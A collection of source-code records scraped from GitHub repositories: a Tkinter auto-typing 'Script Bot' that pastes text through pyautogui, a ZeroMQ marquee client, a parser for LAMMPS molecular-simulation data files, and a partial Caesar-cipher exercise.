', str(respData))\r\n\r\ntry:\r\n updateResult = updateCheck[0]\r\nexcept IndexError:\r\n updateResult = \"no updates\"\r\n'''\r\n\r\nvalue = randint(0, 10)\r\n# print(value)\r\n\r\n'''\r\nif updateResult != \"no updates\":\r\n popupmsg(updateResult)\r\nelif value == 5 or value == 9:\r\n thanks()\r\n'''\r\n\r\nif value == 5 or value == 9:\r\n thanks()\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Script Bot 1.1\")\r\n\r\nwindow_height = 600\r\nwindow_width = 600\r\nscreen_width = root.winfo_screenwidth()\r\nscreen_height = root.winfo_screenheight()\r\nx_cordinate = int((screen_width / 2) - (window_width / 2))\r\ny_cordinate = int((screen_height / 2) - (window_height / 2))\r\nroot.geometry(\"{}x{}+{}+{}\".format(window_width, window_height, x_cordinate, y_cordinate))\r\n\r\nsaveText = open(\"send.txt\", \"w\", encoding='utf-8')\r\nsaveText.writelines(\"\")\r\nsaveText.close()\r\n\r\nscriptClicked = False\r\nintervalClicked = False\r\ninterval = 0\r\n\r\nsendText = open(\"send.txt\", \"r+\", encoding='utf-8').read().split()\r\nsendText2 = open(\"send.txt\", \"r+\", encoding='utf-8').read().split(\"\\n\")\r\n\r\n\r\ndef spam_line():\r\n global exitButton\r\n exitButton[\"state\"] = \"disable\"\r\n global saveText, interval\r\n saveText = open(\"send.txt\", \"r\", encoding='utf-8')\r\n n = 1\r\n floatInterval = float(interval)\r\n for word in saveText:\r\n pyperclip.copy(word)\r\n pyautogui.hotkey(\"ctrl\", \"v\")\r\n pyautogui.press('backspace')\r\n # pyautogui.typewrite(word)\r\n pyautogui.press(\"enter\")\r\n if floatInterval.is_integer() and interval > 0:\r\n for i in range(int(interval), 0, -1):\r\n if n == len(sendText):\r\n status.configure(text=\"DONE!\")\r\n root.update()\r\n else:\r\n status.configure(text=i)\r\n root.update()\r\n time.sleep(1)\r\n elif interval < 1:\r\n status.configure(text=\"QUICK MODE\")\r\n root.update()\r\n n += 1\r\n if n > len(sendText):\r\n n = n - 1\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalEntered.insert(1.0, \"LINE COUNT: \" + str(n) + \" out of \" + str(len(sendText)))\r\n root.update()\r\n\r\n\r\ndef spam_word():\r\n global exitButton\r\n exitButton[\"state\"] = \"disable\"\r\n global saveText, interval\r\n n = 1\r\n floatInterval = float(interval)\r\n for word in sendText:\r\n pyperclip.copy(word)\r\n pyautogui.hotkey(\"ctrl\", \"v\")\r\n # pyautogui.typewrite(word)\r\n pyautogui.press(\"enter\")\r\n if floatInterval.is_integer() and interval > 0:\r\n for i in range(int(interval), 0, -1):\r\n if n == len(sendText):\r\n status.configure(text=\"DONE!\")\r\n root.update()\r\n else:\r\n status.configure(text=i)\r\n root.update()\r\n time.sleep(1)\r\n elif interval < 1:\r\n status.configure(text=\"QUICK MODE\")\r\n root.update()\r\n n += 1\r\n if n > len(sendText):\r\n n = n - 1\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalEntered.insert(1.0, \"WORD COUNT: \" + str(n) + \" out of \" + str(len(sendText)))\r\n root.update()\r\n\r\n\r\ndef spam_message():\r\n text = scriptEntered.get(\"1.0\", \"end\")\r\n if text == \"Enter Your Script\\n\" or text == \"\":\r\n status.configure(text=\"Write Some Text First\")\r\n return\r\n else:\r\n root.update()\r\n global interval, saveText\r\n try:\r\n interval = intervalEntered.get(\"1.0\", \"end\")\r\n interval = float(interval)\r\n except ValueError:\r\n status.configure(text=\"Type A Number For The Interval\")\r\n return\r\n global sendText\r\n saveText = open(\"send.txt\", \"w\", encoding='utf-8')\r\n saveText.writelines(text)\r\n saveText.close()\r\n sendText = open(\"send.txt\", \"r+\", encoding='utf-8').read().split()\r\n if (not interval.is_integer() and interval > 1) or interval < 0:\r\n smallerFont = tkFont.Font(family=\"Lucida Grande\", size=14, weight=\"bold\")\r\n status.configure(text=\"PLEASE ENTER AN INTEGER OR A NUMBER BETWEEN 0 AND 1\", font=smallerFont)\r\n return\r\n status.configure(text=\"Starting In 2 Seconds\")\r\n root.update()\r\n time.sleep(2)\r\n # resume_app(0)\r\n if lineOrWord.get() == 0:\r\n spam_word()\r\n elif lineOrWord.get() == 1:\r\n spam_line()\r\n\r\n\r\n'''\r\ndef resume_app(x):\r\n global exitButton\r\n exitButton.destroy()\r\n exitButton = ttk.Button(root, text=\"Exit\", width=10, state=tk.DISABLED)\r\n exitButton.place(relheight=0.08, relx=0.87, rely=0.905)\r\n global saveText, interval, pauseButton\r\n n = 1\r\n floatInterval = float(interval)\r\n if x == 0:\r\n # pauseButton.place(relheight=0.08, relwidth=.1, relx=0.67, rely=0.835)\r\n for word in sendText:\r\n pyautogui.typewrite(word)\r\n pyautogui.press(\"enter\")\r\n if floatInterval.is_integer() and interval > 0:\r\n for i in range(int(interval), 0, -1):\r\n if n == len(sendText):\r\n status.configure(text=\"DONE!\")\r\n root.update()\r\n else:\r\n status.configure(text=i)\r\n root.update()\r\n time.sleep(1)\r\n elif interval < 1:\r\n status.configure(text=\"QUICK MODE\")\r\n root.update()\r\n n += 1\r\n if n > len(sendText):\r\n n = n - 1\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalEntered.insert(1.0, \"WORD COUNT: \" + str(n) + \" out of \" + str(len(sendText)))\r\n root.update()\r\n elif x == 1:\r\n global buttonFont\r\n status.configure(text=\"RESUMING\")\r\n root.update()\r\n pauseButton.destroy()\r\n buttonFont = tkFont.Font(size='20', weight='bold')\r\n pauseButton = tk.Button(root, text=\"||\", width=7, command=pause_app)\r\n pauseButton['font'] = buttonFont\r\n # pauseButton.place(relheight=0.08, relwidth=.1, relx=0.67, rely=0.835)\r\n time.sleep(1)\r\n status.configure(text=\"RESUMING\")\r\n root.update()\r\n exitButton.destroy()\r\n exitButton = ttk.Button(root, text=\"Exit\", width=10, command=lambda: sys.exit(0))\r\n exitButton.place(relheight=0.08, relx=0.87, rely=0.905)\r\n'''\r\n\r\n\r\ndef script_init(event):\r\n global scriptClicked\r\n if scriptClicked:\r\n return None\r\n else:\r\n scriptEntered.delete(1.0, \"end\")\r\n scriptClicked = True\r\n\r\n\r\ndef interval_init(event):\r\n global intervalClicked\r\n if intervalClicked:\r\n return None\r\n else:\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalClicked = True\r\n\r\n\r\ndef clear_app():\r\n global scriptClicked, intervalClicked, interval, saveText\r\n scriptClicked = False\r\n intervalClicked = False\r\n interval = 0\r\n scriptEntered.delete(1.0, \"end\")\r\n scriptEntered.insert(1.0, \"Enter Your Script\")\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalEntered.insert(1.0, \"Interval Duration (in seconds)\")\r\n saveText = open(\"send.txt\", \"w\", encoding='utf-8')\r\n saveText.writelines(\"\")\r\n saveText.close()\r\n status.configure(text=\"CLEARED!\")\r\n root.update()\r\n time.sleep(1)\r\n status.configure(text=\"SCRIPT BOT\")\r\n root.update()\r\n\r\n\r\n'''\r\ndef pause_app():\r\n global buttonFont\r\n global pauseButton\r\n status.configure(text=\"PAUSED\")\r\n root.update()\r\n pauseButton.destroy()\r\n buttonFont = tkFont.Font(size='40', weight='bold')\r\n pauseButton = tk.Button(root, text=\"▶\", width=7, command=lambda: resume_app(1))\r\n pauseButton['font'] = buttonFont\r\n # pauseButton.place(relheight=0.08, relwidth=.1, relx=0.67, rely=0.835)\r\n'''\r\n\r\nscriptEntered = tk.Text(root, width=50, height=22)\r\nscriptEntered.grid(column=0, row=0, pady=(50, 15), padx=(100, 0))\r\nscriptEntered.insert(1.0, \"Enter Your Script\")\r\n\r\nintervalEntered = tk.Text(root, width=50, height=2)\r\nintervalEntered.grid(column=0, row=1, padx=(100, 0))\r\nintervalEntered.insert(1.0, \"Interval Duration (in seconds)\")\r\n\r\nlineOrWord = IntVar()\r\n\r\nlineCB = ttk.Checkbutton(root, text=\"Line\", width=10, variable=lineOrWord, onvalue=1, offvalue=0)\r\nlineCB.place(relheight=0.08, relx=0.2, rely=0.81)\r\n\r\nwordCB = ttk.Checkbutton(root, text=\"Word\", width=10, variable=lineOrWord, onvalue=0, offvalue=1)\r\nwordCB.place(relheight=0.08, relx=0.2, rely=0.86)\r\nlineOrWord.set(1)\r\n\r\nstartButton = ttk.Button(root, text=\"Start\", width=30, command=spam_message)\r\nstartButton.place(relwidth=0.3, relheight=0.15, relx=0.35, rely=0.8)\r\n\r\nclearButton = ttk.Button(root, text=\"Clear\", width=10, command=clear_app)\r\nclearButton.place(relheight=0.08, relx=0.011, rely=0.905)\r\n\r\nbuttonFont = tkFont.Font(size='20', weight='bold')\r\n\r\n# pauseButton = tk.Button(root, text=\"||\", width=7, command=pause_app)\r\n# pauseButton['font'] = buttonFont\r\n# pauseButton.place(relheight=0.08, relwidth=.1, relx=0.67, rely=0.835)\r\n\r\nexitButton = ttk.Button(root, text=\"Exit\", width=10, command=lambda: sys.exit(0))\r\nexitButton.place(relheight=0.08, relx=0.87, rely=0.905)\r\n\r\nfontStyle = tkFont.Font(family=\"Lucida Grande\", size=24, weight=\"bold\")\r\n\r\nstatus = ttk.Label(root, text=\"SCRIPT BOT\", width=50, font=fontStyle, anchor=\"center\")\r\nstatus.place(relwidth=1, relheight=0.068, relx=0.0, rely=0.007)\r\n\r\nscriptEntered.bind(\"\", script_init)\r\nintervalEntered.bind(\"\", interval_init)\r\n\r\nscrollbar = Scrollbar(root)\r\nscrollbar.grid(column=1, row=0, sticky='ns', pady=(50, 15))\r\nscriptEntered.config(yscrollcommand=scrollbar.set)\r\nscrollbar.config(command=scriptEntered.yview)\r\n\r\n# root.iconbitmap('icon.ico')\r\nroot.resizable(False, False)\r\nroot.mainloop()\r\n","repo_name":"cengizozel/Script-Bot","sub_path":"ScriptBot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12263404431","text":"#!/usr/bin/python\n\nimport zmq\nimport sys\nimport time\nfrom PIL import Image\nimport base64\n\ndef main():\n context = zmq.Context()\n zmq_sock = context.socket(zmq.REQ)\n zmq_sock.connect(\"tcp://127.0.0.1:5556\")\n cmd = sys.argv[1]\n target = sys.argv[2]\n param = {}\n if target == \"show_image\":\n image = Image.open(sys.argv[3])\n param = {\n 'pixels': base64.b64encode(image.tobytes()),\n 'size': image.size,\n 'mode': image.mode,\n }\n elif len(sys.argv) > 3:\n param = dict(zip(sys.argv[3::2], sys.argv[4::2]))\n msg = {cmd: target, \"param\": param} # e.g. {'action': 'set_line', 'param': {'row': 1, 'value': 'your text here'}}\n zmq_sock.send_json(msg)\n result = zmq_sock.recv_json()\n print(\"Result: {0}\".format(result))\n# end main\n\nif __name__ == '__main__':\n main()\n","repo_name":"sampscl/scope-marquee","sub_path":"scope-marquee/tell-marquee.py","file_name":"tell-marquee.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"39840687310","text":"from colorama import Fore\n\n\ndef lid_header(fname):\n \"\"\" This function extracts header from LAMMPS input data file.\n\n Syntax:\n mol_data, typ_data, bnd_data = lid_header(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n molecular_data: No. of atoms, bonds, angles, dihedrals, and impropers\n in LAMMPS input data file.\n\n types_data: No. of atom, bond, angle, dihedral, and improper types in\n LAMMPS input data file.\n\n boundary_data: Data of periodic boundary box which contains lower and\n upper limits of simulation box in x, y, and z directions.\n\n Example:\n mol_data, typ_data, bnd_data = lid_header(\"system.data\")\n\n \"\"\"\n\n with open(fname, \"r\") as ifile:\n lines = ifile.readlines()\n ifile.close()\n\n sections = [\"Masses\", \"Atoms\", \"Bonds\", \"Angles\", \"Dihedrals\", \"Impropers\"]\n molecular_prop = [\"atoms\", \"bonds\", \"angles\", \"dihedrals\", \"impropers\"]\n types_prop = [\"atom\", \"bond\", \"angle\", \"dihedral\", \"improper\"]\n boundary_prop = [\"xlo\", \"xhi\", \"ylo\", \"yhi\", \"zlo\", \"zhi\"]\n molecular_data = [0, 0, 0, 0, 0]\n types_data = [0, 0, 0, 0, 0]\n boundary_data = [0, 0, 0, 0, 0, 0]\n\n for line in lines:\n line = line.split()\n\n if (len(line) >= 2 and line[1] in molecular_prop):\n molecular_data[molecular_prop.index(line[1])] = line[0]\n\n elif (len(line) >= 3 and line[1] in types_prop):\n types_data[types_prop.index(line[1])] = line[0]\n\n elif (len(line) >= 4 and line[2] in boundary_prop):\n boundary_data[boundary_prop.index(line[2])] = line[0]\n boundary_data[boundary_prop.index(line[2]) + 1] = line[1]\n\n elif ((len(line) >= 1) and (line[0] in sections)):\n break\n\n return molecular_data, types_data, boundary_data\n\n\ndef parse_lid(fname):\n \"\"\"This function parses LAMMPS input data file and returns the line numbers\n at which various sections of LAMMPS input data start.\n\n Syntax:\n lid_sections = parse_lid(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n The output argument of this function is a list containing six sublists\n i.e., 1. masses section, 2. atoms section, 3. bonds section,\n 4. angles section, 5. dihedrals section, and 6. impropers section.\n Each sublist has two elements in which first element is the line\n number of LAMMPS input data file at which the corresponding section\n starts and second element is always zero. If first element of a sublist\n is zero, it means the corresponding section does not exist in LAMMPS\n input data file. Second zero element in any sublist is utilized by\n other functions of this module to extract required data of a section\n from LAMMPS input data file.\n\n Example:\n lid_sections = parse_lid(\"system.data\")\n\n \"\"\"\n\n with open(fname, \"r\") as ifile:\n lines = ifile.readlines()\n ifile.close()\n\n mas_section = [0, 0]\n atm_section = [0, 0]\n bnd_section = [0, 0]\n ang_section = [0, 0]\n dih_section = [0, 0]\n imp_section = [0, 0]\n\n counter = 0\n\n for line in lines:\n line = line.split()\n\n if (len(line) >= 1 and line[0] == \"Masses\"):\n mas_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Atoms\"):\n atm_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Bonds\"):\n bnd_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Angles\"):\n ang_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Dihedrals\"):\n dih_section[0] = counter\n\n elif (len(line) >= 1 and line[0] == \"Impropers\"):\n imp_section[0] = counter\n\n counter += 1\n\n return [mas_section, atm_section, bnd_section, ang_section, dih_section,\n imp_section]\n\n\ndef masses(fname):\n \"\"\"This function returns masses section from LAMMPS input data file.\n\n Syntax:\n masses_data = masses(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n masses_data: Data of atomic masses of elements in the relevant force\n field in LAMMPS input data file.\n\n Example:\n masses_data = masses(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[0][0] == 0:\n print(Fore.RED + \"Warning: No masses data available.\")\n print(Fore.RED + \"LAMMPS simulation can't run.\")\n masses_data = None\n start = -1\n stop = -1\n\n elif in_data[0][0] == max(in_data)[0]:\n start = in_data[0][0] + 1\n stop = None\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[0][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[0][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[0][0] > 0:\n stop.append(element[1][0] - in_data[0][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[0][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n masses_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n masses_data.append(line)\n\n return masses_data\n\n\ndef atoms(fname):\n \"\"\"This function returns atoms section from LAMMPS input data file.\n\n Syntax:\n atoms_data = atoms(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n atoms_data: Atoms data (atomic IDs, atom types, molecular IDs, charge,\n and x, y, z coordinates of all atoms in the simulation box) from\n LAMMPS input data file.\n\n Example:\n atoms_data = atoms(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[1][0] == 0:\n print(Fore.RED + \"Warning: No atoms data available.\")\n print(Fore.RED + \"LAMMPS simulation can't run.\")\n atoms_data = None\n start = -1\n stop = -1\n\n elif in_data[1][0] == max(in_data)[0]:\n start = in_data[1][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[1][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[1][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[1][0] > 0:\n stop.append(element[1][0] - in_data[1][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[1][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n atoms_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n atoms_data.append(line)\n\n return atoms_data\n\n\ndef bonds(fname):\n \"\"\"This function returns bonds section from LAMMPS input data file.\n\n Syntax:\n bonds_data = bonds(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n bonds_data: Bonds data (bond IDs, bond types, atomic IDs of bonding\n atoms) from LAMMPS input data file.\n\n Example:\n bonds_data = bonds(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[2][0] == 0:\n print(Fore.RED + \"Warning: No atoms data available.\")\n print(Fore.RED + \"LAMMPS simulation may produce wrong results.\")\n bonds_data = None\n start = -1\n stop = -1\n\n elif in_data[2][0] == max(in_data)[0]:\n start = in_data[2][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[2][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[2][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[2][0] > 0:\n stop.append(element[1][0] - in_data[2][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[2][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n bonds_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n bonds_data.append(line)\n\n return bonds_data\n\n\ndef angles(fname):\n \"\"\"This function returns angles section from LAMMPS input data file.\n\n Syntax:\n angles_data = angles(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n angles_data: Angles data (angle IDs, angle types, and atomic IDs having\n angle) from LAMMPS input data file.\n\n Example:\n angles_data = angles(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[3][0] == 0:\n print(Fore.RED + \"Warning: No angles data available.\")\n print(Fore.RED + \"LAMMPS simulation may produce wrong results.\")\n angles_data = None\n start = -1\n stop = -1\n\n elif in_data[3][0] == max(in_data)[0]:\n start = in_data[3][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[3][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[3][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[3][0] > 0:\n stop.append(element[1][0] - in_data[3][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[3][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n angles_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n angles_data.append(line)\n\n return angles_data\n\n\ndef dihedrals(fname):\n \"\"\"This function returns dihedrals section from LAMMPS input data file.\n\n Syntax:\n dihedrals_data = dihedrals(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n dihedrals_data: Dihedrals data (dihedral IDs, dihedral types, and\n atomic IDs having dihedral angle) from LAMMPS input data file.\n\n Example:\n dihedrals_data = dihedrals(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[4][0] == 0:\n print(Fore.RED + \"Warning: No dihedrals data available.\")\n print(Fore.RED + \"LAMMPS simulation may produce wrong results.\")\n dihedrals_data = None\n start = -1\n stop = -1\n\n elif in_data[4][0] == max(in_data)[0]:\n start = in_data[4][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[4][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[4][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[4][0] > 0:\n stop.append(element[1][0] - in_data[4][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[4][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n dihedrals_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n dihedrals_data.append(line)\n\n return dihedrals_data\n\n\ndef impropers(fname):\n \"\"\"This function returns impropers section from LAMMPS input data file.\n\n Syntax:\n impropers_data = impropers(fname)\n\n Input argument(s):\n fname: Name of LAMMPS input data file.\n\n Output argument(s):\n impropers_data: Impropers data (improper IDs, improper types, and\n atomic IDs having improper angle) from LAMMPS input data file.\n\n Example:\n impropers_data = impropers(\"system.data\")\n\n \"\"\"\n\n in_data = parse_lid(fname)\n\n stop = []\n\n if in_data[5][0] == 0:\n print(Fore.RED + \"Warning: No impropers data available.\")\n print(Fore.RED + \"LAMMPS simulation may produce wrong results.\")\n impropers_data = None\n start = -1\n stop = -1\n\n elif in_data[5][0] == max(in_data)[0]:\n start = in_data[5][0] + 1\n stop = None\n\n else:\n for element in enumerate(in_data):\n\n if element[1][0] - in_data[5][0] == 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[5][0] < 0:\n stop.append(5000000000000)\n\n elif element[1][0] - in_data[5][0] > 0:\n stop.append(element[1][0] - in_data[5][0])\n\n stop = stop.index(min(stop))\n stop = in_data[stop][0]\n start = in_data[5][0] + 1\n\n with open(fname, \"r\") as infile:\n lines = infile.readlines()[start:stop]\n infile.close()\n\n impropers_data = []\n for line in lines:\n line = line.split()\n\n if line != []:\n impropers_data.append(line)\n\n return impropers_data\n","repo_name":"aamirlab/AAMIR-Pack","sub_path":"src/lid_functions.py","file_name":"lid_functions.py","file_ext":"py","file_size_in_byte":13238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42673623236","text":"import string\nimport re\nfrom random import randint\n\n### HELPER CODE ###\ndef load_words(file_name):\n '''\n file_name (string): the name of the file containing \n the list of words to load \n \n Returns: a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n '''\n# print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(file_name, 'r')\n # wordlist: list of strings\n wordlist = []\n for line in inFile:\n wordlist.extend([word.lower() for word in line.split(' ')])\n# print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef is_word(word_list, word):\n '''\n Determines if word is a valid word, ignoring\n capitalization and punctuation\n\n word_list (list): list of words in the dictionary.\n word (string): a possible word.\n \n Returns: True if word is in word_list, False otherwise\n\n Example:\n >>> is_word(word_list, 'bat') returns\n True\n >>> is_word(word_list, 'asdf') returns\n False\n '''\n word = word.lower()\n word = word.strip(\" !@#$%^&*()-_+={}[]|\\:;'<>?,./\\\"\")\n return word in word_list\n\n#def get_story_string():\n# \"\"\"\n# Returns: a story in encrypted text.\n# \"\"\"\n# f = open(\"story.txt\", \"r\")\n# story = str(f.read())\n# f.close()\n# return story\n#\n### END HELPER CODE ###\n\nWORDLIST_FILENAME = 'words.txt'\n\nclass Message(object):\n def __init__(self, text):\n '''\n Initializes a Message object\n \n text (string): the message's text\n\n a Message object has two attributes:\n self.message_text (string, determined by input text)\n self.valid_words (list, determined using helper function load_words)\n '''\n self.message_text = text\n self.valid_words = load_words(WORDLIST_FILENAME)\n\n def get_message_text(self):\n '''\n Used to safely access self.message_text outside of the class\n \n Returns: self.message_text\n '''\n return self.message_text\n\n def get_valid_words(self):\n '''\n Used to safely access a copy of self.valid_words outside of the class.\n This helps you avoid accidentally mutating class attributes.\n \n Returns: a COPY of self.valid_words\n '''\n return self.valid_words\n \n def build_shift_dict(self, shift):\n '''\n Creates a dictionary that can be used to apply a cipher to a letter.\n The dictionary maps every uppercase and lowercase letter to a\n character shifted down the alphabet by the input shift. The dictionary\n should have 52 keys of all the uppercase letters and all the lowercase\n letters only. \n \n shift (integer): the amount by which to shift every letter of the \n alphabet. 0 <= shift < 26\n\n Returns: a dictionary mapping a letter (string) to \n another letter (string). \n '''\n\n lower_letters = list(string.ascii_lowercase)\n upper_letters = list(string.ascii_uppercase)\n mapping_dict = {}\n for ch in string.ascii_letters:\n if ch in string.ascii_lowercase:\n index = lower_letters.index(ch)\n shift_change = index - shift\n if abs(shift_change) > 26 :\n shift_change %=26 \n mapping_dict[ch] = lower_letters[shift_change] \n if ch in string.ascii_uppercase:\n index = upper_letters.index(ch) \n shift_change = index - shift\n if abs(shift_change) > 26 :\n shift_change %=26 \n mapping_dict[ch] = upper_letters[shift_change] \n return mapping_dict\n \n def apply_shift(self, shift):\n '''\n Applies the Caesar Cipher to self.message_text with the input shift.\n Creates a new string that is self.message_text shifted down the\n alphabet by some number of characters determined by the input shift \n \n shift (integer): the shift with which to encrypt the message.\n 0 <= shift < 26\n\n Returns: the message text (string) in which every character is shifted\n down the alphabet by the input shift\n '''\n original_list = list(self.get_message_text())\n req_list = []\n mapping_dict = self.build_shift_dict(shift) \n for ch in original_list:\n if ch in string.ascii_letters:\n req_list.append(mapping_dict[ch])\n else:\n req_list.append(ch)\n return(''.join(req_list))\n \n\nclass PlaintextMessage(Message):\n def __init__(self, text, shift):\n '''\n Initializes a PlaintextMessage object \n \n text (string): the message's text\n shift (integer): the shift associated with this message\n\n A PlaintextMessage object inherits from Message and has five attributes:\n self.message_text (string, determined by input text)\n self.valid_words (list, determined using helper function load_words)\n self.shift (integer, determined by input shift)\n self.encryption_dict (dictionary, built using shift)\n self.message_text_encrypted (string, created using shift)\n\n '''\n self.message_text = text\n self.valid_words = load_words(WORDLIST_FILENAME)\n self.shift = shift\n self.encryption_dict = self.build_shift_dict(shift)\n self.message_text_encrypted = self.apply_shift(shift)\n\n def get_shift(self):\n '''\n Used to safely access self.shift outside of the class\n \n Returns: self.shift\n '''\n return self.shift\n\n def get_encryption_dict(self):\n '''\n Used to safely access a copy self.encryption_dict outside of the class\n \n Returns: a COPY of self.encryption_dict\n '''\n return self.get_encryption_dict\n \n def get_message_text_encrypted(self):\n '''\n Used to safely access self.message_text_encrypted outside of the class\n \n Returns: self.message_text_encrypted\n '''\n return self.get_message_text_encrypted()\n\n def change_shift(self, shift):\n '''\n Changes self.shift of the PlaintextMessage and updates other \n attributes determined by shift. \n \n shift (integer): the new shift that should be associated with this message.\n 0 <= shift < 26\n\n Returns: nothing\n '''\n self.__init__(self.text, shift)\n\n\nclass CiphertextMessage(Message):\n def __init__(self, text):\n '''\n Initializes a CiphertextMessage object\n \n text (string): the message's text\n\n a CiphertextMessage object has two attributes:\n self.message_text (string, determined by input text)\n self.valid_words (list, determined using helper function load_words)\n '''\n# print(\"Entered Class Cipher Message\")\n self.message_text = text\n self.valid_words = load_words(WORDLIST_FILENAME)\n\n \n\n def decrypt_message(self):\n '''\n Decrypt self.message_text by trying every possible shift value\n and find the \"best\" one. We will define \"best\" as the shift that\n creates the maximum number of real words when we use apply_shift(shift)\n on the message text. If s is the original shift value used to encrypt\n the message, then we would expect 26 - s to be the best shift value \n for decrypting it.\n\n Note: if multiple shifts are equally good such that they all create \n the maximum number of valid words, you may choose any of those shifts \n (and their corresponding decrypted messages) to return\n\n Returns: decrypted message text\n \n '''\n# print(\"Entered Class Decrypt Message\")\n string_cut = self.get_message_text()\n# print(string_cut)\n words_all = re.findall(r\"[\\w']+|[.,!?;]+ |[\\\" @#$%^&*()_+\\<\\>\\!\\{\\}\\'\\\\\\/]\",string_cut)\n# while(\"\" in words):\n# words.remove(\"\")\n words= []\n for w in words_all:\n for ch in w:\n if ch in string.ascii_letters:\n flag = 0\n else:\n flag = 1\n if flag ==0:\n words.append(w)\n# print(words)\n \n shift_list = []\n for w in words:\n shift = 0\n while (shift<27):\n new_letter = []\n dictionary = self.build_shift_dict(shift)\n for ch in w:\n new_letter.append(dictionary[ch])\n new_word= ''.join(new_letter)\n if (is_word(self.valid_words, new_word)): \n shift_list.append(shift)\n break\n else:\n shift+=1\n if shift ==27:\n shift_list.append(0)\n\n# print(shift_list)\n i= 0\n real_word_list=[]\n for w in words:\n# print(w)\n real_char_list= []\n mapping_dict = self.build_shift_dict(shift_list[i]) \n for ch in w:\n real_char_list.append(mapping_dict[ch])\n real_word = ''.join(real_char_list)\n# print(real_word)\n real_word_list.append(real_word)\n i+=1\n# print(real_word_list)\n \n# print(words_all)\n i=0\n for w in words_all:\n index = words_all.index(w)\n for ch in w:\n if ch in string.ascii_letters:\n flag = 1\n else:\n flag = 0\n break\n if flag ==1:\n words_all[index] = real_word_list[i]\n# print(w)\n# print(real_word_list[i])\n# print(\"Transfer happening\")\n i+=1\n# print(words_all)\n decrypted_string = ''.join(words_all)\n return decrypted_string\n \n def get_multiple(self,word):\n '''\n inputs a dis scrambled word and returns all possible solutions\n ''' \n shift_list = []\n shift = 0\n point =0\n while (shift<26):\n new_letter = []\n dictionary = self.build_shift_dict(shift)\n for ch in word:\n if ch in string.ascii_letters:\n new_letter.append(dictionary[ch])\n new_word= ''.join(new_letter)\n if (is_word(self.valid_words, new_word)): \n shift_list.append(shift)\n point +=1\n shift +=1\n# print(shift)\n else:\n shift+=1\n# print(shift_list)\n if point >= 1: \n real_word = []\n i= 0\n real_char_list= []\n while(i < 